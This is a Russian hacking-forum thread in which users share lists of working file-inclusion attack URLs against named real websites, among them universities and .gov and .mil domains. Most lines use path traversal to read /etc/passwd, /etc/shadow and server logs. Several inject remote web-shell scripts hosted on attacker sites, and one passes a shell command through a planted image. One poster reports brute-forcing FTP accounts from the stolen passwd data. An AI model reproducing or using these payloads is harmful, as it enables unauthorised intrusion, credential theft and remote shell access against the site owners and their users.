Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 2 символов.

http://lcsd.wednet.edu/hs/Newsletter/archive.php?file=../../../../../../../../../../../etc/passwd

чтото все по edu пошли))
ну и я отставать не буду.

http://www.wccs.edu/index.php?[url]

=~=~=~

http://ai.isi.edu/index.php?module=seminars/index&submodule=../../../../../etc/passwd

може баян, хз
http://sdc.missouri.edu/index.php?page=../../../etc/passwd

http://power-soccer.hostarea.org/?page=[shell]

=\\


http://www.ourcs.org.uk/index.php?content=../../../../../../etc/passwd
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/group
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/hosts
http://www.ourcs.org.uk/index.php?content=../../../../../../etc/services



http://www.sbpep.org/index.php?content=../../../../../../etc/passwd
http://www.sbpep.org/index.php?content=../../../../../../etc/group
http://www.sbpep.org/index.php?content=../../../../../../etc/hosts
http://www.sbpep.org/index.php?content=../../../../../../etc/services
http://www.sbpep.org/index.php?content=../../../../../../etc/ftpusers
http://www.sbpep.org/index.php?content=../../../../../../etc/syslog.conf

http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/passwd
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/hosts
http://www.studentmedia.ou.edu/index.php?page=../../../../../../../../../etc/group

=\\


http://primotechnology.com/index.php?art=../../../../../../etc/passwd
http://primotechnology.com/index.php?art=../../../../../../etc/group
http://primotechnology.com/index.php?art=../../../../../../etc/hosts
http://primotechnology.com/index.php?art=../../../../../../etc/services
http://primotechnology.com/index.php?art=../../../../../../etc/syslog.conf



http://koolfind.com/index.cgi?file=../../../../../../etc/passwd
http://koolfind.com/index.cgi?file=../../../../../../etc/group
http://koolfind.com/index.cgi?file=../../../../../../etc/hosts
http://koolfind.com/index.cgi?file=../../../../../../etc/services
http://koolfind.com/index.cgi?file=../../../../../../etc/syslog.conf



http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/passwd&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/group&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/hosts&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/services&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/syslog.conf&lang=1&declara=4
http://www.derechos-humanos.info/index.php?cont=../../../../../../etc/ftpusers&lang=1&declara=4

http://www.ippn.org/article.php?ID=../../../../../../../../../../../../../../../../../../../../etc/passwd
также:
syslog.conf/shells вместо passwd

http://www.avto-bike.ru/osn.php/?id=../../../../../../../../../../../../../../../../../../../../etc/passwd&tema=guard

http://www.newsall.net.ru/news02.php?menu=no&news=[url]

http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/Password/etc-passwd.txt

PHP-INCLUDE[антИБоян] (http://www.downloads.xclan.ru/php-include.txt)

Работаем чисто по PHP-INCLUDE[антИБоян]
PHP-INCLUDE[антИБоян] отсортированно/удаленно дубликаты
Берусь за PHP-INCLUDE[антИБоян] следить/делать [update]

http://acvecc.org/page.php?page=../../../../../../../../../etc/passwd
http://acvecc.org/page.php?page=../../../../../../../../../etc/hosts
http://acvecc.org/page.php?page=../../../../../../../../../etc/group
http://acvecc.org/page.php?page=../../../../../../../../../etc/services

http://www.uganda.sfgd.org/index.php?page=../../../../../../../../../../../../etc/passwd
http://www.uganda.sfgd.org/index.php?page=../../../../../../../../../../../../etc/group

http://eng.sttu.ac.ir/main.php?BodyFile=../../../../../etc/passwd

http://eng.sttu.ac.ir/main.php?BodyFile=[url]

http://www.thebigloop.com/portal/display.php?page=../../../../../etc/passwd

http://www.martechportal.com/client/mt.php?ads=0&bodyfile=../../../../../etc/passwd&ma=Y

1. file_get_contents()
http://codebrowse.com/view_file.php?path=../../../../../../etc/passwd
http://codebrowse.com/view_file.php?path=../../../../../../etc/hosts
http://codebrowse.com/view_file.php?path=../../../../../../etc/group
http://codebrowse.com/view_file.php?path=../../../../../../etc/services
http://codebrowse.com/view_file.php?path=../../../../../../etc/syslog.conf

Ловите

http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/passwd
http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/group


http://iaald.org/cee/index.php?page=http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/passwd
http://iaald.org/cee/index.php?page=http://childrengoldentriangle.org/static/main.php?page=../../../../../../../../../../../../../etc/group


http://www.teamabrisud.org/index.php?page=../../../../../../../../../../../../../etc/passwd
http://www.teamabrisud.org/index.php?page=../../../../../../../../../../../../../etc/group

http://tztour.ru/sanatory.php?[url]

http://romadan.bdk.com.ru/index_files/texts/txt.php?text=[url]

http://solarworld.ru/map.php?p=[url]&t=6

http://www.heraeus-wch.ru/load.php?part=[url]

1. include().
http://www.ritterbrindes.com.br/new/index.php?file=/etc/passwd
http://www.ritterbrindes.com.br/new/index.php?file=/etc/hosts
http://www.ritterbrindes.com.br/new/index.php?file=/etc/group
http://www.ritterbrindes.com.br/new/index.php?file=/etc/services
http://www.ritterbrindes.com.br/new/index.php?file=/etc/syslog.conf
2. include().
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/passwd
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/hosts
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/group
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/services
http://math.uoregon.edu/photos/index.php?photo=../../../../../../etc/syslog.conf
3. include().
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/passwd
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/hosts
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/group
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/services
http://iah.aces.uiuc.edu/index.php?ch=../../../../../../etc/syslog.conf

.ee

http://www.sauepuit.ee/index.php?page=[url]

http://www.whalecall.org/index.php?page=../../../../../../../../../../../etc/passwd
http://www.whalecall.org/index.php?page=../../../../../../../../../../../etc/hosts

http://thecrums.org/?page=../../../../../../etc/passwd
http://thecrums.org/?page=../../../../../../etc/hosts
http://thecrums.org/?page=../../../../../../etc/group
http://thecrums.org/?page=../../../../../../var/log/httpd/access_log

ИГРАЕМ ПО КРУПНОМУ!!!
.GOV
http://www.mli.nih.gov/funding/assay_dev_fund_res_cycle3.php?=
http://www.nassaucountyny.gov/login/newusrfrm.php?=
http://www-cmls.llnl.gov/?url=
http://www.doc.nv.gov/news/display.php?article_id=
http://digitalpreservation.gov/contact.php?=
http://health.utah.gov/hflcra/rules/rulepage.php?Rule=

А ТЕПЕРЬ ПОШЛИ ВОЕННЫЕ
.MIL

http://knowledgebase.msiac.dmso.mil/day.php?&catid=&d=31&m=7&w=6&wd=0&y=2005&s=
http://www.nau.usace.army.mil/business/products.php?m=
http://rad.usuhs.mil/rad/?=

И по мелочи
.EDY

http://rad.usuhs.edu/medpix/menu/main_menu.html?=

ИГРАЕМ ПО КРУПНОМУ!!!
.GOV
http://www.mli.nih.gov/funding/assay_dev_fund_res_cycle3.php?=
http://www.nassaucountyny.gov/login/newusrfrm.php?=
http://www-cmls.llnl.gov/?url=
http://www.doc.nv.gov/news/display.php?article_id=
http://digitalpreservation.gov/contact.php?=
http://health.utah.gov/hflcra/rules/rulepage.php?Rule=

А ТЕПЕРЬ ПОШЛИ ВОЕННЫЕ
.MIL

http://knowledgebase.msiac.dmso.mil/day.php?&catid=&d=31&m=7&w=6&wd=0&y=2005&s=
http://www.nau.usace.army.mil/business/products.php?m=
http://rad.usuhs.mil/rad/?=

И по мелочи
.EDY

http://rad.usuhs.edu/medpix/menu/main_menu.html?=

и что тут по крупному?
просто сайты с ошибками нашёл 5 мин работы!!!!

http://gold.chelkon.ru/index.php?doc=../../../../../etc/passwd

ИГРАЕМ ПО КРУПНОМУ!!!
.GOV
http://www.mli.nih.gov/funding/assay_dev_fund_res_cycle3.php?=
http://www.nassaucountyny.gov/login/newusrfrm.php?=
http://www-cmls.llnl.gov/?url=
http://www.doc.nv.gov/news/display.php?article_id=
http://digitalpreservation.gov/contact.php?=
http://health.utah.gov/hflcra/rules/rulepage.php?Rule=

А ТЕПЕРЬ ПОШЛИ ВОЕННЫЕ
.MIL

http://knowledgebase.msiac.dmso.mil/day.php?&catid=&d=31&m=7&w=6&wd=0&y=2005&s=
http://www.nau.usace.army.mil/business/products.php?m=
http://rad.usuhs.mil/rad/?=

И по мелочи
.EDY

http://rad.usuhs.edu/medpix/menu/main_menu.html?=
Ребята, специально проверил все ссылки, не нашел ни одного инклуда. Зачем постить такие сообщение?
З. Ы. Клянчить репу ето по меньшей мере тупо, лучше занялся бы чем полезным и помог кому нибудь...

http://www.fashionistastheshow.com/index.php?node=../../../../../etc/passwd

http://www.e-mela.com/viewPage.php?page=[url]

http://www.britishoppression.com/index.php?page=[url]

вот ещё одна
http://www.linux-hogyan.hu/indexen.php?page=[url]

урожайный день сегодня))
http://www.bookdjralph.com/index.php?Page=[url]

http://prairial.free.fr/calendrier/calendrier.php?lien=[url]

Симсоны))
http://www.springfieldspringfield.co.uk/main.php?view=../../../../../etc/passwd

http://www.gonzographix.com/HTML/index.php?page=[url]

http://bodoradio.com/modulos/index.php?page=[url]

http://www.dbrage.net/index6.php?page=[url]

Сайт: aa.com //Продажа авиобилетов.
http://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../etc/passwd

http://infodoc.3x.ro/index.php?sMain=[url]

http://www.animed.us/V.php?id=[url]

=\\


http://www.virtualglobalbank.com/index.php?read=../../../../../etc/passwd
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/hosts
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/syslog.conf
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/services
http://www.virtualglobalbank.com/index.php?read=../../../../../etc/group



http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/passwd
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/hosts
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/syslog.conf
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/services
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/group
http://www.timjanis.com/index.cgi?PAGE=../../../../../../../../etc/ftpusers

=\\


http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/passwd&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/hosts&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/services&tsid=1
http://www.proskateshop.com/cgi-bin/index.cgi?page=../../../../../etc/syslog.conf&tsid=1



http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/passwd
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/hosts
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/services
http://www.1click.jp/sportstrans/index.cgi?page=../../../../../etc/syslog.conf

=\\


http://finance.anali3.info/news02.php?menu=yes&page=1&news=[site.ru/shell.php]

=\\


http://security.onme.info/news01.php?menu=yes&page=1&news=[shell.php]

=\\


http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/passwd
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/hosts
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/services
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/syslog.conf
http://www.morozov.com.ua/eng/body/news/news.php?menu=../../../../../etc/group

=\\


http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/passwd
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/hosts
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/services
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/syslog.conf
http://www.indel.com.br/solar/es/index.php?u=../../../../../etc/group

=\\


http://www.hendribustan.com/index.php?mode=[shell.php]

=\\


http://www.ufabc.edu.br/index.php?p=../../../../../etc/passwd
http://www.ufabc.edu.br/index.php?p=../../../../../etc/hosts
http://www.ufabc.edu.br/index.php?p=../../../../../etc/services
http://www.ufabc.edu.br/index.php?p=../../../../../etc/syslog.conf
http://www.ufabc.edu.br/index.php?p=../../../../../etc/group

http://www.lib.pte.hu/main.php?menu=services&article=[url]

=\\


http://www.avtos.net.ru/news02.php?menu=yes&page=1&news=[shell.php]

PHP-INCLUDE[антИБоян] (http://www.downloads.xclan.ru/php-include.php)

Last Update 15.06.07
Работаем чисто по PHP-INCLUDE[антИБоян]
PHP-INCLUDE[антИБоян] отсортированно/удаленно дубликаты
Давайте будем работать чисто по PHP-INCLUDE[антИБоян]!?

http://www.klostertische.eu/index.php?page=../../../etc/passwd
http://www.klostertische.eu/index.php?page=../../../etc/services
http://www.klostertische.eu/index.php?page=../../../etc/syslog.conf

=\

http://kcou.missouri.edu/index.php?page=../../etc/passwd
..

=\\


http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/passwd&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/hosts&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/group&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/services&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/ftpusers&cont=2&nota=80

=\\


http://www.dorothyrowe.com.au/index.php?u=../../../../etc/passwd
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/hosts
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/group
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/services

=\\


http://www.bujinkan-ninpo-ryu-geneva.com/index.php?u=[shell]

=\\


http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/passwd
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/hosts
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/group
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/services
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/syslog.conf

=\\


http://sdc.missouri.edu/index.php?page=../../../etc/passwd
http://sdc.missouri.edu/index.php?page=../../../etc/group
http://sdc.missouri.edu/index.php?page=../../../etc/syslog.conf
http://sdc.missouri.edu/index.php?page=../../../etc/services

вот и до сюда я добрался

http://www.narkote.net/ndstat/reports/index.php?rep=[shell]&per=week

=\\

http://www.kpvm.tv/page.php?page=../../../../../../etc/passwd
http://www.kpvm.tv/page.php?page=../../../../../../etc/hosts
http://www.kpvm.tv/page.php?page=../../../../../../etc/group
http://www.kpvm.tv/page.php?page=../../../../../../etc/services
http://www.kpvm.tv/page.php?page=../../../../../../etc/syslog.conf

http://www.la-rose-eternelle.org/index.php?page=[shell]

http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/passwd
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/group
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/hosts
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/services

http://www.aeac.org.br/?pg=../../../../../../../etc/passwd
http://www.aeac.org.br/?pg=../../../../../../../etc/group
http://www.aeac.org.br/?pg=../../../../../../../etc/services
http://www.aeac.org.br/?pg=../../../../../../../etc/hosts

http://www.conscienciajovem.org/?pagina=[shell]

http://www.lasequia.org/alenergia/index.php?pagina=[shell]

http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/passwd
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/groups
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/services
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/services

По паре логин/пасс с файла /etc/passwd сбрутил три аккаунта к фтп.

http://www.mantracvostok.ru/russian/page.php?pg=[shell]

=\\


http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/passwd
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/hosts
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/syslog.conf
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/services
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/ftpusers
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/group

=\\


http://www.rennsportnews.de/index.php?load=../../../../../etc/passwd
http://www.rennsportnews.de/index.php?load=../../../../../etc/hosts
http://www.rennsportnews.de/index.php?load=../../../../../etc/services
http://www.rennsportnews.de/index.php?load=../../../../../etc/group

=\\


http://www.motos-gaz.ch/index.php?nav=../../../../../etc/passwd
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/hosts
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/services
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/group

http://www.internetelite.ru/medprom/index.phtml?part=[shell]

http://www.superyacht.de/bex.phtml?content=[url]

http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/passwd%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/group%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/ftpusers%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/hosts%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/services%00

2+StArT+:
Не боянь! Разве КРОТ_find не для всех АНТИБОЯН (http://www.downloads.xclan.ru/php-include.php) поддержывает?

Вот вам инклуд удаленный:

http://www.tgwashington.org/old/index.php?pg=[shell]

2+StArT+:
Пацанчик ты куда так розогнался?
Тебе же сказали, боянить - нехорошо!
Прекрати постить то, что люди давно постили до тебя!

Инклуд локальный:

http://home.no.net/taikido/show.php?page=../../../../../../../../etc/passwd%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/group%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/hosts%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/services%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/syslog.conf%00

http://tanatos.ru/index.php?nav=/../../../../../../etc/passwd%00&id=17
http://tanatos.ru/index.php?nav=../../../../../../../../../../../usr/local/etc/apache2/httpd.conf%00&id=17
http://tanatos.ru/index.php?nav=../../../../../../../../../../../usr/local/www/pwd%00&id=17

=\\

http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/passwd&id=2447&desc=full
http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/group&id=2447&desc=full
http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/hosts&id=2447&desc=full

http://www.spa-nyc.com/custompage.php?include=../../../../../../etc/passwd

2+StArT+:
Не боянь! Разве КРОТ_find не для всех АНТИБОЯН (http://www.downloads.xclan.ru/php-include.php) поддержывает?

Извиняюсь ,больше не повторится. =)
__________________________________________________ _

www.teaching.iub.edu
TEACHING & LEARNING Indiana University Teaching Handbook
.................................................. ................................
http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/hosts

http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/passwd

http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/ftpusers

http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/syslog.conf
.................................................. ................................

www.sportmaster.ru/tm.php?site=http://www.ya.ru

kair, ну и чё? Тупо фреймится страница
<frameset rows="20,*" frameborder="NO" border=false>
<frame src="/ssi/shap_opt.html" name="topfrm" marginheight="0" marginweight="0" scrolling="NO" frameborder="NO">
<frame src="http://google.com" name="mainfrm" scrolling="auto" frameborder="NO">
Вы хоть смотрите что постите, пиздец

=\\


http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/passwd
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/group
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/hosts
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/services
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/syslog.conf

=\\


http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/passwd
http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/hosts
http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/group

=\\

Удаленный инклуд


http://www.tmtu.co.kr/test/test.php?page=http://oneline.ucoz.ru/madshell.php -[shell]

=\\


http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/passwd&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/hosts&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/group&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/syslog.conf&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/ftpusers&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../etc/services&id=30

http://www.amsimon.com/guestbook/admin.php?action=list&tmp_theme=../../../../../etc/passwd

http://www.maris.gr/guestbook/kisgb/view_private.php?start=252&action=edit&tmp_theme=../../../../../../etc/passwd


/=

1. Unix.
http://infocentrum.opava.cz/index2.php?file=[url] (без .php)

http://www.velvethills.org/index.php?page=../../../../../etc/passwd
http://www.velvethills.org/index.php?page=../../../../../etc/group
http://www.velvethills.org/index.php?page=../../../../../etc/hosts
http://www.velvethills.org/index.php?page=../../../../../etc/ftpusers
http://www.velvethills.org/index.php?page=../../../../../etc/services
http://www.velvethills.org/index.php?page=../../../../../etc/syslog.conf

Логи /etc/httpd/logs/acces.log, но нету прав на чтение :=(

http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/passwd
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/group
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/syslog.conf
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/services
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/hosts

http://od.thinkhead.com/index.php?page=../../../../../../etc/passwd
http://od.thinkhead.com/index.php?page=../../../../../../etc/hosts
http://od.thinkhead.com/index.php?page=../../../../../../etc/group
http://od.thinkhead.com/index.php?page=../../../../../../etc/services
Логи
http://od.thinkhead.com/index.php?page=../../../../../../usr/local/apache/logs/access_log
http://od.thinkhead.com/index.php?page=../../../../../../usr/local/apache/logs/error_log

http://www.boroondarabrass.org/index.php?page=../../../../../etc/passwd
http://www.boroondarabrass.org/index.php?page=../../../../../etc/group
http://www.boroondarabrass.org/index.php?page=../../../../../etc/ftpusers
http://www.boroondarabrass.org/index.php?page=../../../../../etc/hosts
http://www.boroondarabrass.org/index.php?page=../../../../../etc/services

http://www.dancehistory.org/index.php?page=../../../../../../etc/passwd
http://www.dancehistory.org/index.php?page=../../../../../../etc/group
http://www.dancehistory.org/index.php?page=../../../../../../etc/hosts
http://www.dancehistory.org/index.php?page=../../../../../../etc/services

http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/passwd
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/group
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/services
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/syslog.conf
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/hosts

http://www.bizcert.org/index.php?page=../../../../etc/passwd
http://www.bizcert.org/index.php?page=../../../../etc/group
http://www.bizcert.org/index.php?page=../../../../etc/services
http://www.bizcert.org/index.php?page=../../../../etc/ftpusers
ЛОГИ
http://www.bizcert.org/index.php?page=../../../../usr/local/apache/logs/access_log
http://www.bizcert.org/index.php?page=../../../../usr/local/apache/logs/error_log

eStore:
2edo.com
2edo.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

brewercoinc.com
brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

birdstheword.com
birdstheword.com//cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

dailygrindcafeboutique.com
dailygrindcafeboutique.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

thepartsdude.com
thepartsdude.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

africansisters.com
http://www.africansisters.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

urbanbeads.com
http://www.urbanbeads.com/cgi-urbanbeads/search/tseekdir.cgi?location=/etc/passwd%00

ubicol.com
http://www.ubicol.com/cgi-bin/tseek/tseekdir.cgi?location=/etc/passwd%00

globalblogs.com
http://www.globalblogs.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

maennerseiten.de
http://www.maennerseiten.de/cgi-bin/turboseek/tseekdir.cgi?location=/etc/passwd%00

www.maskeret.com
http://www.maskeret.com/cgi-bin/seek/tseekdir.cgi?location=/etc/passwd%00


EzPay:
tuge2000.com
http://www.tuge2000.com/index.php?read=../../../../../../../../../../../../../../etc/passwd

thedmgroup.com
http://www.thedmgroup.com/etc/passwd

http://www.xpient.com/ubb/ubbt.inc.php?thispath=http://file-hran2006.narod.ru/shell.txt?

safe_mode: OFF

=\\

http://www.giseo.co.kr/index.php?body=../../../../../../etc/group
http://www.giseo.co.kr/index.php?body=../../../../../../etc/hosts
http://www.giseo.co.kr/index.php?body=../../../../../../etc/passwd
http://www.giseo.co.kr/index.php?body=../../../../../../etc/services
http://www.giseo.co.kr/index.php?body=../../../../../../etc/syslog.conf

=\\


http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/passwd%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/group%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/hosts%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/services%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/syslog.conf%00

Log:

http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../usr/local/apache/domlogs/savco/surgicalpathologyatlas.com%00

=\\


http://gallery.vakmos.org/index.php?template=../../../../../../../etc/passwd%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/group%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/hosts%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/syslog.conf%00

http://www.macsandpcs.net/?page=[shell]

http://www.norppa.net/2.0/?page=[shell]

http://actionscripttips.com/index.php?id=../../../../../etc/passwd
http://actionscripttips.com/index.php?id=/../../../../../../../etc/syslog.conf
http://actionscripttips.com/index.php?id=/../../../../../../../etc/services
http://actionscripttips.com/index.php?id=/../../../../../../../etc/hosts
http://actionscripttips.com/index.php?id=/../../../../../../../etc/group

http://www.madison.com/archives/read.php?ref=../../../../../etc/passwd
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/syslog.conf
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/services
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/hosts
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/group

http://juathuur.spiderforest.com/content.php?page=../../../../../etc/passwd
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/syslog.conf
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/services
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/hosts
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/group

некогда не любил Ивана Франко

http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/shadow
http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/passwd
http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/services

http://moon.mystarseed.com/new/new.php?page=../../../../../etc/passwd%00
http://www.sambura.com/new/new.php?file=[url]
=\

Скажи року нет :

http://www.natobata.com.br/?arquivo=bandas.php&titulo=images/tituloBandas.jpg&banda=http://oneline.ucoz.ru/madshell.php

=\\


http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/passwd
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/syslog.conf
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/ftpusers
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/hosts

http://www.eurekawebs.com/redir_frame.cfm?Path=[SH3LL]

http://www.eurekawebs.com/redir_frame.cfm?Path=[SH3LL]

обычный фрейм же какой тут шелл :mad:

1. http://www.itc.virginia.edu/. PR - 7.
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/passwd&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/syslog.conf&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/hosts&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/group&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/services&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../usr/local/apache/logs/access_log&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../usr/local/apache/logs/error_log&issueID=26

Все как на чистом листе :)


_http://armacaodepera.com/gallery/index.php?template=../../../../../../../../../../../etc/passwd%00
_http://www.ttzezere.com/4images/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00

2. Linux. PR - 4.
http://www.e-mela.com/viewPage.php?page=[url]
3. Linux. PR - 0. :)
http://www.britishoppression.com/index.php?page=[url]
4. FreeBSD. PR - 2.
http://www.ketchmark.com/netscape1.php?content=[url]
5. Unix. PR - 1.
